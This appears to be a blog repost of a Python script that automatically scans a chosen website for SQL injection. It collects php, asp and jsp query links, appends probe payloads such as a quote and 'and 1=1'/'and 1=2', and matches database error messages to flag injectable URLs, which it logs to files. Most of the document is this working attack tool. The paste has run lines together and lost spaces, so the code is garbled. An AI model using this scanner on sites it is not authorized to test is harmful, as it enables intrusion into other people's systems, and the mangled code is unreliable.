1 importrequests,re,time,os2 from tqdm importtqdm3 from bs4 importBeautifulSoup4 defzhuru():5 globalx,headers,ps6 user=input('[+]Please enter the URL you want to test:') #用戶輸入要檢測的網站

7 url="{}".format(user.strip()) #去除兩邊的空格

8 headers={'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36'}9 request=requests.get(url,headers) #瀏覽器頭

10 shoujiurl=[] #創建一個收集URL鏈接的列表

11 rse=request.content12 gwd=BeautifulSoup(rse,'html.parser')13 php=gwd.find_all(href=re.compile(r'php\?')) #尋找后綴名為php的鏈接

14 asp=gwd.find_all(href=re.compile(r'asp\?')) #尋找后綴名為asp的鏈接

15 jsp=gwd.find_all(href=re.compile(r'jsp\?')) #尋找后綴名為jsp的鏈接

16 print('[+]Collection URL')17 for i in tqdm(range(1,500)): #進度條

18 time.sleep(0.001) #進度條

19 for lk inphp:20 basd=lk.get('href') #提取其中的鏈接

21 shoujiurl.append(basd) #加入列表

22 for ba inasp:23 basd2=ba.get('href') #提取其中的鏈接

24 shoujiurl.append(basd2) #加入列表

25 for op injsp:26 basd3=op.get('href') #提取其中的鏈接

27 shoujiurl.append(basd3) #加入列表

28 print('[+]Collection completed')29

30

31 huixian=[]32 huixian1 = "is not a valid MySQL result resource"

33 huixian2 = "ODBC SQL Server Driver"

34 huixian3 = "Warning:ociexecute"

35 huixian4 = "Warning: pq_query[function.pg-query]"

36 huixian5 = "You have an error in your SQL syntax"

37 huixian6 = "Database Engine"

38 huixian7 = "Undefined variable"

39 huixian8 = "on line"

40 huixian9 = "mysql_fetch_array():"

41

42 huixian.append(huixian1)43 huixian.append(huixian2)44 huixian.append(huixian3)45 huixian.append(huixian4)46 huixian.append(huixian5)47 huixian.append(huixian6)48 huixian.append(huixian7)49 huixian.append(huixian8)50 huixian.append(huixian9)51 for g inhuixian:52 ps="".join(g) #過濾掉[]

53

54 payload0="'"

55 payload1="''"

56 payload2="%20and%201=1"

57 payload3="%20and%201=2"

58 for x inshoujiurl:59 yuan="".join(x) #過濾掉[]

60 ssdx="".join(x)+payload0 #添加payload

61 ssdx2="".join(x)+payload162 ssdx3="".join(x)+payload263 ssdx4="".join(x)+payload364 pdul=re.findall('[a-zA-z]+://[^\s]*',ssdx) #過濾掉一些殘缺不全的鏈接

65 pdul2=re.findall('[a-zA-z]+://[^\s]*',ssdx2)66 pdul3=re.findall('[a-zA-z]+://[^\s]*',yuan)67 pdul4=re.findall('[a-zA-z]+://[^\s]*',ssdx3)68 pdul5=re.findall('[a-zA-z]+://[^\s]*',ssdx4)69 psuw="".join(pdul) #過濾掉[]

70 psuw2="".join(pdul2)71 psuw3="".join(pdul3)72 psuw4="".join(pdul4)73 psuw5="".join(pdul5)74 try:75 resg=requests.get(url=psuw,headers=headers,timeout=6)76 resg2=requests.get(url=psuw2,headers=headers,timeout=6)77 resg3=requests.get(url=psuw3,headers=headers,timeout=6)78 resg4=requests.get(url=psuw4,headers=headers,timeout=6)79 resg5=requests.get(url=psuw5,headers=headers,timeout=6)80 if resg.status_code == 200: #判斷狀態碼是否等于200

81 print('[+]The first step is completed, and the goal is to be stable')82 time.sleep(1)83 if resg.content != resg2.content and resg3.content == resg2.content: #判斷是不是字符型注入

84

85 print('[+]Existence of character injection')86 print(resg3.url)87 print(resg3.url,file=open('character.txt','a')) #如果是寫入腳本

88 elif resg4.content != resg5.content and resg4.content == resg3.content: #判斷是不是數字型注入

89 print('[+]Digital injection')90 print(resg3.url)91 print(resg3.url,file=open('injection.txt','a')) #如果是寫入腳本

92 else: #兩者都不是

93 print('[+]Sorry, not character injection')94 print('[+]Sorry, not Digital injection')95 print(resg3.url)96 if ps instr(resg2.content):97 print('[+]The wrong sentence to be found',ps)98 elif resg.status_code != 200:99 print('http_stode:',resg.status_code)100 print('[-]Sorry, I cant tell if there is an injection')101 except:102 pass

103

104

105 zhuru()

總結

以上是生活随笔為你收集整理的python sql注入脚本_python打造一个分析网站SQL注入的脚本的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。